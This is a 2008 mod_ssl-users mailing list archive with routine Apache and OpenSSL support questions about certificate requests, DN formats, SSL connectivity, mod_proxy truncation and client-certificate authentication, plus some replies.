-----
You are about to be ask=
ed to enter information that will be incorporated
into your certificate =
request.
What you are about to enter is what is called a Distinguished N=
ame or a DN.
There are quite a few fields but you can leave some blankFor some fields there will be a default value=2C
If you enter '.'=2C t=
he field will be left blank.
-----
.

.

.

.

A challenge password []:vj150
Error adding attribute
3556:error:0D0BF=
041:asn1 encoding routines:ASN1_item_dup:malloc failure:.\crypto
\asn1\a=
_dup.c:104: problems making Certificate Request

C:\Program Files\Apache Software Foundation\Apache2.2\bin>=3B

Want to do more with Windows Live? Learn =9310 hidden secrets=94 from J=
amie. Learn Now
=

--_570866f9-027b-4173-aa22-95b8226bec4c_--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 10 23:29:18 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9231A14DA37; Wed, 10 Sep 2008 23:29:18 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from tns-smtpgw-us.win2k.corp.tnsi.com (mail1.tnsi.com [208.224.248.9])
	by master.modssl.org (Postfix) with SMTP id 0986D14DA2F
	for ; Wed, 10 Sep 2008 23:29:17 +0200 (CEST)
Received: From tns-mail-brisbn.win2k.corp.tnsi.com ([172.17.77.25]) by tns-smtpgw-us.win2k.corp.tnsi.com (WebShield SMTP v4.5 MR2);
	id 1221082094576; Wed, 10 Sep 2008 17:28:14 -0400
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C9138C.2071A00E"
X-MimeOLE: Produced By Microsoft Exchange V6.5
Subject: RE: SSL_CLIENT_S_DN & SSL_CLIENT_I_DN Formats
Date: Thu, 11 Sep 2008 07:28:11 +1000
Message-ID: <747D2BE1ADABE44286FDB654AD436B5330BB48@tns-mail-brisbn.win2k.corp.tnsi.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: RE: SSL_CLIENT_S_DN & SSL_CLIENT_I_DN Formats
Thread-Index: AckTjCCmfLU2XpVRRoazh89m/d1Yug==
From: "Bolger, Ken" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bolger, Ken" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C9138C.2071A00E
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hi,
=20
I have noticed that the DN components of the SSL_CLIENT_S_DN and
SSL_CLIENT_I_DN
environment variables are separated by the '/' (forward slash) character
rather than
the ',' (comma) separator as required by  RFC2253.=20
=20
Is the use of the forward slash part of an older standard or is there
another reason for its use?
Is there a setting to change the format?
=20
Thanks,
=20
Ken Bolger

------_=_NextPart_001_01C9138C.2071A00E
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable







Hi,


 


I have noticed that the DN components of the=20
SSL_CLIENT_S_DN and SSL_CLIENT_I_DN


environment variables are separated by the =
'/' (forward=20
slash) character rather than


the ',' (comma) separator as required by =
 RFC2253.=20



 


Is the use of the forward slash part of an =
older=20
standard or is there another reason for its =
use?


Is there a setting to change the=20
format?


 


Thanks,


 


Ken =
Bolger


------_=_NextPart_001_01C9138C.2071A00E--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 15 20:54:53 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D5C1114D9EA; Mon, 15 Sep 2008 20:54:53 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from wr-out-0506.google.com (wr-out-0506.google.com [64.233.184.225])
	by master.modssl.org (Postfix) with ESMTP id 1FB8614D82E
	for ; Mon, 15 Sep 2008 20:54:52 +0200 (CEST)
Received: by wr-out-0506.google.com with SMTP id c8so1140390wra.13
        for ; Mon, 15 Sep 2008 11:53:48 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to
         :subject:mime-version:content-type;
        bh=a0+lKmpz+ivrqvjP9AGoNxKEmQteF95YKfnD8ENxMHk=;
        b=aGWW2RbAAS2sla30QmnBm6Qr/HEzG+PA7W8m+e4lzYF2ShLQEJjxDL4ll7AIp1R8+g
         4oqeIfpMmSmDxAAM0gWwjWD3H2i6cBEwJxYsWyTH1HlOGnR8ium+dpVLrctFApH+aK/J
         PBlzbaNQ2PZJY5XbEtqQ2h8ehlg7LwyBWZGfQ=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:mime-version:content-type;
        b=BEAzsoNoYYICLrVsh4wC7AYEIsayeDeoH8xSXH74ya5/cq69FNscZ4yeK44O1/QNe1
         FhGTRnWb+TVoos6yfoBYSh87Hzg71+cUoKwa4uaXgT7qmm/8GUlgGZxMoJjlZf+G6tUW
         3Uk8Br/nNbTqv8Cjji1XF09AyNhaWMgmI2a2s=
Received: by 10.65.124.7 with SMTP id b7mr15331142qbn.88.1221504826872;
        Mon, 15 Sep 2008 11:53:46 -0700 (PDT)
Received: by 10.64.47.14 with HTTP; Mon, 15 Sep 2008 11:53:46 -0700 (PDT)
Message-ID: <72e593830809151153g2ead65dct766b74fc9a285463@mail.gmail.com>
Date: Mon, 15 Sep 2008 11:53:46 -0700
From: "John Fox" 
To: modssl-users@modssl.org
Subject: SSL works from server command line, but not from outside server. Weird!
MIME-Version: 1.0
Content-Type: multipart/mixed; 
	boundary="----=_Part_34414_18548211.1221504826823"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John Fox" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_34414_18548211.1221504826823
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi, folks.

I've run across a wierd problem -- https/SSL works fine when accessed
from the machine running httpd, but is unavailable from all others.

Software versions: Apache 1.3.37/mod_ssl-2.8.28-1.3.37/OpenSSL 0.9.8b

Running 'http' on port 8118, 'https' on port 8119

I get positive results from openssl's "s_client" when I connect to
8119 from the server's command line:

  $ openssl s_client -connect webdev-gold:8119
  CONNECTED(00000003)
  depth=0 /C=US/ST=Oregon/L=Medford/O=Musey's
Pal/OU=WebDev/CN=webdev-gold.musiciansfriend.com/emailAddress=foo@bar.net
  verify error:num=18:self signed certificate
  verify return:1
  depth=0 /C=US/ST=Oregon/L=Medford/O=Musey's
Pal/OU=WebDev/CN=webdev-gold.musiciansfriend.com/emailAddress=foo@bar.net
  < SNIP >
  New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
  Server public key is 1024 bit
  Compression: NONE
  Expansion: NONE
  SSL-Session:
      Protocol  : TLSv1
      Cipher    : DHE-RSA-AES256-SHA
      Session-ID:
9D8989B47E6EE3546426AFC100348052D900956A40E0C33AAB41019D71CF515E
      Session-ID-ctx:
      Master-Key:
EF1AC496532EE1B8EF0F63988AB7CED1F05F9EAB8675DD76DC54A6DC6E91410C12B9808C8567B803838137B79089591C
      Key-Arg   : None
      Krb5 Principal: None
      Start Time: 1221497972
      Timeout   : 300 (sec)
      Verify return code: 18 (self signed certificate)
  ---

To verify this a bit further, I (again, from the server's command
line) made use of the 'lynx' browswer to attempt accessing https on
port 8119 -- this worked, as well.

Next thing I tried was running the same "s_client" command from my
workstation's command line:
(openssl version 0.9.8g))

  $ openssl s_client -connect webdev-gold:8119 -state -debug
  CONNECTED(00000003)
  SSL_connect:before/connect initialization
  write to 0x80c1340 [0x80c22f8] (124 bytes => 124 (0x7C))
  0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 39 00 00   .z....Q... ..9..
  0010 - 38 00 00 35 00 00 16 00-00 13 00 00 0a 07 00 c0   8..5............
  0020 - 00 00 33 00 00 32 00 00-2f 00 00 07 05 00 80 03   ..3..2../.......
  0030 - 00 80 00 00 05 00 00 04-01 00 80 00 00 15 00 00   ................
  0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
  0050 - 00 00 06 04 00 80 00 00-03 02 00 80 78 79 d0 f1   ............xy..
  0060 - 49 80 86 36 2c 4a 72 b0-9a 3d 73 a6 d7 2e e9 78   I..6,Jr..=s....x
  0070 - 05 4e 73 b7 84 12 ea 38-18 b1 41 c2               .Ns....8..A.
  SSL_connect:SSLv2/v3 write client hello A
  read from 0x80c1340 [0x80c7858] (7 bytes => 7 (0x7))
  0000 - 3c 21 44 4f 43 54 59                              
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8088C14DA3A; Wed, 17 Sep 2008 19:12:00 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from twig.itsd.gov.bc.ca (twig.itsd.gov.bc.ca [142.32.11.119])
	by master.modssl.org (Postfix) with ESMTP id D04F414D82E
	for ; Wed, 17 Sep 2008 19:11:59 +0200 (CEST)
Received: from covey.idir.bcgov ([142.32.12.69])
	by twig.itsd.gov.bc.ca (8.12.5-20030917/8.12.5) with ESMTP id m8HHAn1d019118
	for ; Wed, 17 Sep 2008 10:10:57 -0700
Received: from light.idir.bcgov ([142.32.12.124]) by covey.idir.bcgov with Microsoft SMTPSVC(6.0.3790.1830);
	 Wed, 17 Sep 2008 10:10:44 -0700
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C918E8.529F8198"
Subject: Truncated response via mod_proxy
Date: Wed, 17 Sep 2008 10:10:45 -0700
Message-ID: <2B61B4E9AB9C244EA661E4A80A63358814A646@light.idir.bcgov>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Truncated response via mod_proxy
Thread-Index: AckY6FJBvCtHvbsXSRKiUwWr37O/9g==
From: "Kogelheide, Ryan LCS:EX" 
To: 
X-OriginalArrivalTime: 17 Sep 2008 17:10:44.0701 (UTC) FILETIME=[522E38D0:01C918E8]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kogelheide, Ryan LCS:EX" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C918E8.529F8198
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

I'm trying to debug an issue with a client getting a truncated response
via mod_proxy and mod_ssl on apache 2.0.63. The client software is
SQLAnywhere, and they are trying to get a response from a backend web
service running under IIS6. If they make the request directly against
the origin server via SSL or port 80, it works. If they query via the
reverse-proxy on port 80, it works. On SSL via the reverse-proxy the
results are truncated (only part of the XML is returned).

=20

This reverse-proxy serves hundreds of vhosts and thousands of clients a
day. This is the only vhost + client with a problem.

=20

Using wireshark, we can see that the rproxy is sending an encrypted
alert 21 and then client is sending an SSL alert 21 and closing the
connection.=20

=20

I've set Apache's LogLevel to debug, and I can see the incoming SSL
handshake and the request, and I can see the mod_proxy working, but I
don't see a detailed trace of the response going back (even though a
partial response is sent). The access log says that the whole response
is returned. Is there some special command to trace the response?

=20

Regards,

=20

Ryan

=20


------_=_NextPart_001_01C918E8.529F8198
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















I’m trying to debug an issue with a client =
getting a
truncated response via mod_proxy and mod_ssl on apache 2.0.63. The =
client
software is SQLAnywhere, and they are trying to get a response from a =
backend
web service running under IIS6. If they make the request directly =
against the
origin server via SSL or port 80, it works. If they query via the =
reverse-proxy
on port 80, it works. On SSL via the reverse-proxy the results are =
truncated
(only part of the XML is returned).



 



This reverse-proxy serves hundreds of vhosts and =
thousands
of clients a day. This is the only vhost + client with a =
problem.



 



Using wireshark, we can see that the rproxy is =
sending an
encrypted alert 21 and then client is sending an SSL alert 21 and =
closing the
connection. 



 



I’ve set Apache’s LogLevel to debug, and =
I can
see the incoming SSL handshake and the request, and I can see the =
mod_proxy
working, but I don’t see a detailed trace of the response going =
back
(even though a partial response is sent). The access log says that the =
whole
response is returned. Is there some special command to trace the =
response?



 



Regards,



 



Ryan



 









------_=_NextPart_001_01C918E8.529F8198--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Sep 21 01:11:20 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AC01514D9E6; Sun, 21 Sep 2008 01:11:20 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from post-relay2.olivant.fo (post-relay2.olivant.fo [212.55.32.105])
	by master.modssl.org (Postfix) with ESMTP id 8CC2914D838
	for ; Sun, 21 Sep 2008 01:11:19 +0200 (CEST)
Received: from post-relay2.olivant.fo (localhost [127.0.0.1])
	by antivirus.post.olivant.fo (Postfix) with SMTP id C7DAD2D6E362
	for ; Sun, 21 Sep 2008 00:10:15 +0100 (WEST)
Received: from [10.0.0.176] (unknown [212.55.38.14])
	by post-relay2.olivant.fo (Postfix) with ESMTP id B62DF2D6E362
	for ; Sun, 21 Sep 2008 00:10:15 +0100 (WEST)
Message-ID: <48D582D8.4010909@gunnar-pv.fo>
Date: Sun, 21 Sep 2008 00:10:16 +0100
From: Gunnar Vestergaard 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 SeaMonkey/1.1.11
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Authenticating users based on S/MIME certificate
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Gunnar Vestergaard 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi. I am an administrator of a user account at an Apache web server. 
Currently the server is running Apache 1.3.37. My hosting provider plans 
on switching to new hardware with possibly new software. So I don't know 
if my web server will be run on Apache 1.3.37 or Apache 2.0.

My goal is to let visitors of my web site authenticate themselves to my 
web server using some certificate, possibly S/MIME certificates.

Now, my current S/MIME certificate for personal e-mail is approved for 
the following purposes:
Email Signer Certificate
Email Recipient Certificate

Is it possible to have such a certificate authenticate its user towards 
an SSL web server? In any case I want to have a limited crowd of users 
seeing a subdirectory of pages without bothering the user with a user 
name/password dialog. Just their personal certificate lets them see 
pages in a certain subdirectory.

As I understand the documentation for PHP, there is no means whereby PHP 
can read and interpret an SSL client certificate. Is that correct?

Gunnar
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 22 12:40:05 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0BA0014D88C; Mon, 22 Sep 2008 12:40:05 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from anchor-post-32.mail.demon.net (anchor-post-32.mail.demon.net [194.217.242.90])
	by master.modssl.org (Postfix) with ESMTP id 9375614D83F
	for ; Mon, 22 Sep 2008 12:39:54 +0200 (CEST)
Received: from sisyphus.demon.co.uk ([80.177.167.86])
	by anchor-post-32.mail.demon.net with esmtp (Exim 4.67)
	id 1Khioc-0008hP-7d
	for modssl-users@modssl.org; Mon, 22 Sep 2008 10:38:50 +0000
Received: from aeolus.ephyre (daves@mailhost [172.30.127.4])
	by sisyphus.demon.co.uk (8.14.2/8.14.2) with ESMTP id m8MAcneU017687
	for ; Mon, 22 Sep 2008 11:38:49 +0100
Message-ID: <48D775B9.2020006@sisyphus.demon.co.uk>
Date: Mon, 22 Sep 2008 11:38:49 +0100
From: Dave Sparks 
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1.16) Gecko/20080717 SeaMonkey/1.1.11
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Authenticating users based on S/MIME certificate
References: <48D582D8.4010909@gunnar-pv.fo>
In-Reply-To: <48D582D8.4010909@gunnar-pv.fo>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: ClamAV 0.94/8307/Mon Sep 22 06:05:57 2008 on aeolus.ephyre
X-Virus-Status: Clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Sparks 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Gunnar Vestergaard wrote:

 > My goal is to let visitors of my web site authenticate themselves to
 > my web server using some certificate, possibly S/MIME certificates.

 > As I understand the documentation for PHP, there is no means whereby
 > PHP can read and interpret an SSL client certificate. Is that correct?

It's possible to configure Apache 2 to add the client certificate to a 
request header.  From one of my configuration files:

   RewriteCond ${ESC:%{SSL:SSL_CLIENT_CERT}} \
^.*(-----BEGIN%20(X509%20|TRUSTED%20|)CERTIFICATE-----(%0[Dd])?%0[Aa].*%0[Aa]-----END%20\2CERTIFICATE-----(%0[Dd])?%0[Aa]).*$
   RewriteRule ^.*$ - [E=CLIENT_CERT:%1]

   RequestHeader unset L-ClientCert

   RequestHeader set L-ClientCert %{CLIENT_CERT}e env=CLIENT_CERT

The certificate is %-encoded to avoid problems with newline characters. 
  Presumably PHP can use the string in the header to match the 
certificate against a list of known certificates.

The certificate digest would be less unwieldy than the entire 
certificate, but mod_ssl would need some simple changes to make the 
digest available and I would be reluctant to use a hosting provider who 
allowed customers to use a modified mod_ssl.


     Dave Sparks

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 22 20:37:58 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E2AE914DA31; Mon, 22 Sep 2008 20:37:58 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from web58307.mail.re3.yahoo.com (web58307.mail.re3.yahoo.com [68.142.236.160])
	by master.modssl.org (Postfix) with SMTP id 6BDBF14D83F
	for ; Mon, 22 Sep 2008 20:37:57 +0200 (CEST)
Received: (qmail 29208 invoked by uid 60001); 22 Sep 2008 18:36:53 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Message-ID;
  b=cPAadM9dJ8QnCtxZYUbmyt8ilEQlAhZ6lxWgZUyAAa5TeYjNjun6eA8uE1axCtOgmeGplkep3PBQKTEYSRc8Km4kxEyCgwCNUM3/AyKB2XndGmi4AFD6P7CeIlcp2aIas00FMD93NnZCdLCt6Mmo7q/E+GVvHCDVJ67ZAZeic2Q=;
X-YMail-OSG: EPo45n8VM1lhSkHwQI.9WNUM7I0XEnx8GeIl6C6NKcnRphR6.ivPaS1lKwNnXBO_EaVvHznffVvMMeSpdviE.votAvr2r.JISHlExhntkEgEnwAmx5sRUjz_XJuoaMsaXhNVrMsGl5Wc8v0lBYoxhd.P7eY-
Received: from [90.201.202.173] by web58307.mail.re3.yahoo.com via HTTP; Mon, 22 Sep 2008 11:36:53 PDT
X-Mailer: YahooMailRC/1096.28 YahooMailWebService/0.7.218.2
Date: Mon, 22 Sep 2008 11:36:53 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: Authenticating users based on S/MIME certificate
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID: <268918.29169.qm@web58307.mail.re3.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Have a look at mod_authz_ldap (ldap baseed white listing,
http://authzldap.othello.ch/). Probably far more than you need but it
does things along the same lines and has some nice notes how to do
various bits and pieces.

You can add env vars that you can use php have a look at  SSLOptions +StdEnvVars  and +ExportCertData.

Regards
Matt



----- Original Message ----
From: Gunnar Vestergaard 
To: modssl-users@modssl.org
Sent: Sunday, September 21, 2008 12:10:16 AM
Subject: Authenticating users based on S/MIME certificate

Hi. I am an administrator of a user account at an Apache web server. 
Currently the server is running Apache 1.3.37. My hosting provider plans 
on switching to new hardware with possibly new software. So I don't know 
if my web server will be run on Apache 1.3.37 or Apache 2.0.

My goal is to let visitors of my web site authenticate themselves to my 
web server using some certificate, possibly S/MIME certificates.

Now, my current S/MIME certificate for personal e-mail is approved for 
the following purposes:
Email Signer Certificate
Email Recipient Certificate

Is it possible to have such a certificate authenticate its user towards 
an SSL web server? In any case I want to have a limited crowd of users 
seeing a subdirectory of pages without bothering the user with a user 
name/password dialog. Just their personal certificate lets them see 
pages in a certain subdirectory.

As I understand the documentation for PHP, there is no means whereby PHP 
can read and interpret an SSL client certificate. Is that correct?

Gunnar
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                  www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



      
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 22 21:13:27 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2880614DA31; Mon, 22 Sep 2008 21:13:27 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail42.e.nsc.no (mail42.e.nsc.no [193.213.115.42])
	by master.modssl.org (Postfix) with ESMTP id D141514D83F
	for ; Mon, 22 Sep 2008 21:13:26 +0200 (CEST)
Received: from mailtilmeg.com ([62.92.2.220])
	by mail42.nsc.no (8.13.8/8.13.5) with ESMTP id m8MJCJgD006276
	for ; Mon, 22 Sep 2008 21:12:22 +0200 (MEST)
Received: from  [79.160.31.45] by mailtilmeg.com with Web
  (ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.8 (1.8.9.5)); Mon, 22 Sep 2008 20:54:37 +0200
From: Jan Stian Gabrielli 
To: 
Subject: Can i use CA signed cert to create client authentication certificates ?
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: base64
Message-ID: 
Date: Mon, 22 Sep 2008 20:54:37 +0200
X-ArGoMail-Authenticated: stian@mailtilmeg.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jan Stian Gabrielli 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

SSBhbSB0cnlpbmcgdG8gc2V0IHVwIGFwYWNoZSB3aXRoIG1vZF9zc2wgLCBhbmQgSSBoYXZlIGl0
IHdvcmtpbmcgd2l0aCBhDQpTZWxmIFNpZ25lZCBDQS4NCkJ1dCBpIGNhbiBub3QgZ2V0IGl0IHRv
IHdvcmsgd2l0aCBhIGNlcnQgY3JlYXRlZCBieSB0aGF3dGUuY29tLg0KDQpEb2VzIGFueW9uZSBr
bm93IGlmIGl0IGlzIHBvc3NpYmxlIHRvIGRvIHRoaXMgd2l0aCBhIGNydCBzaWduZWQgYnkgYSAi
dGhpcmQiDQpwYXJ0eSB3aGVyZSBvbmUgZG9lcyBub3QgaGF2ZSBhY2Nlc3MgdG8gdGhlaXIgcm9v
dCBjYSBrZXkgPy4NCg0KSWUuDQoNCkkgaGF2ZSBnZW5lcmF0ZWQgYSA6IGFwYWNoZV9zZXJ2ZXIu
a2V5IG1hZGUgYSBhcGFjaGVfc2VydmVyLmNzciBhbmQgc2VudA0KdGhpcyBmb3Igc2lnbmluZyBi
eSB0aGF3dGUuY29tDQpSZWNpdmVkIGEgYXBhY2hlX3NlcnZlci5jcnQNCg0KQ3JlYXRlZCBhIGNs
aWVudC5rZXkgYW5kIGEgY2xpZW50LmNzcg0KU2lnbmVkIGl0IHdpdGggbXkgYXBhY2hlX3NlcnZl
ci5rZXkgYW5kIGFwYWNoZV9zZXJ2ZXIuY3J0DQoNCkNvbnZlcnRlZCB0aGUgY2xpZW50LmtleSxj
cnQgdG8gYSBwa2NzMTIgZmlsZSBhbmQgaW1wb3J0ZWQgdGhpcyBpbnRvIG15DQpicm93c2VyIGJ1
dCBpIGNhbiBub3QgbWFrZSB0aGluZ3Mgd29yay4NCg0KU1NMIHdvcmtzIGZpbmUgb24gdGhlIHNl
cnZlciBvbiBwYWdlcyB0aGF0IGRvZXMgbm90IHJlcXVpcmUgU1NMIGNsaWVudCBhdXRoLg0KDQpB
IEkgc3RhdGVkIGVhcmxpZXIsIElUIHdvcmtzIHdoZW4gSSBjcmVhdGUgYW5kIHNlbGYgc2lnbiBh
IENBLCBidXQgSSBjYW50DQptYWtlIGl0IHdvcmsgd2hlbiBJIHVzZSBhIDNyZCBwYXJ0eSBDQSBh
bmQgb25seSBoYXZlIGFwYWNoZV9zZXJ2ZXIua2V5LA0KYXBhY2hlX3NlcnZlci5jcnQgLCB0aGF3
dGUgcm9vdCBjZXJ0Lg0KDQpCZXN0IHJlZ2FyZHMNCg0KV2l6a2lkbm9ubw0K

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 22 22:20:15 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 68C5114DA31; Mon, 22 Sep 2008 22:20:15 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from web58305.mail.re3.yahoo.com (web58305.mail.re3.yahoo.com [68.142.236.158])
	by master.modssl.org (Postfix) with SMTP id E5F9D14D83F
	for ; Mon, 22 Sep 2008 22:20:09 +0200 (CEST)
Received: (qmail 32480 invoked by uid 60001); 22 Sep 2008 20:19:05 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=T0ffTypry1IWxqm8cO85dW3Ctkc5WazQb7eE/ZMaf/1mEuEuxpz4uqRaG79kdFd3fIxkyC1z4hdTmOjqGGP770hH++fDFOlMAMyVb3t7MMmAYoTxpgXeqt/uNoZg/3Rnt/DqSwY7e4kWIBuGkG8fO50e1DAa2lGI9uz9N9LG+vM=;
X-YMail-OSG: TZwRK9EVM1kG_mr1QthjP92RaABgAkeKSkEMeeS3_ohPuv4E2wQCexUHYMUNrB3GEfrWJfS2i1Q7r4Xo7U5pLBV2jf8c64EiFolMbvaFfRQOc6VqBXwrmGXYBBCyu1etdW87O1UoVkCQMQhNQXl2v_Okt5Y-
Received: from [90.201.202.173] by web58305.mail.re3.yahoo.com via HTTP; Mon, 22 Sep 2008 13:19:05 PDT
X-Mailer: YahooMailRC/1096.28 YahooMailWebService/0.7.218.2
Date: Mon, 22 Sep 2008 13:19:05 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: Can i use CA signed cert to create client authentication certificates ?
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Message-ID: <247388.32324.qm@web58305.mail.re3.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sounds like your trying to use the thawte apache cert to sign your client c=
erts? The thawte cert won't have the right attributes to sign a client cert=
 and then try to use it.=0A=0AYou could use your CA for client certs and Th=
awte for the server cert.=0A=0ARegards=0AMatt=0A=0A=0A=0A----- Original Mes=
sage ----=0AFrom: Jan Stian Gabrielli =0ATo: modssl-u=
sers@modssl.org=0ASent: Monday, September 22, 2008 7:54:37 PM=0ASubject: Ca=
n i use CA signed cert to create client authentication certificates ?=0A=0A=
I am trying to set up apache with mod_ssl , and I have it working with a=0A=
Self Signed CA.=0ABut i can not get it to work with a cert created by thawt=
e.com.=0A=0ADoes anyone know if it is possible to do this with a crt signed=
 by a "third"=0Aparty where one does not have access to their root ca key ?=
.=0A=0AIe.=0A=0AI have generated a : apache_server.key made a apache_server=
.csr and sent=0Athis for signing by thawte.com=0ARecived a apache_server.cr=
t=0A=0ACreated a client.key and a client.csr=0ASigned it with my apache_ser=
ver.key and apache_server.crt=0A=0AConverted the client.key,crt to a pkcs12=
 file and imported this into my=0Abrowser but i can not make things work.=
=0A=0ASSL works fine on the server on pages that does not require SSL clien=
t auth.=0A=0AA I stated earlier, IT works when I create and self sign a CA,=
 but I cant=0Amake it work when I use a 3rd party CA and only have apache_s=
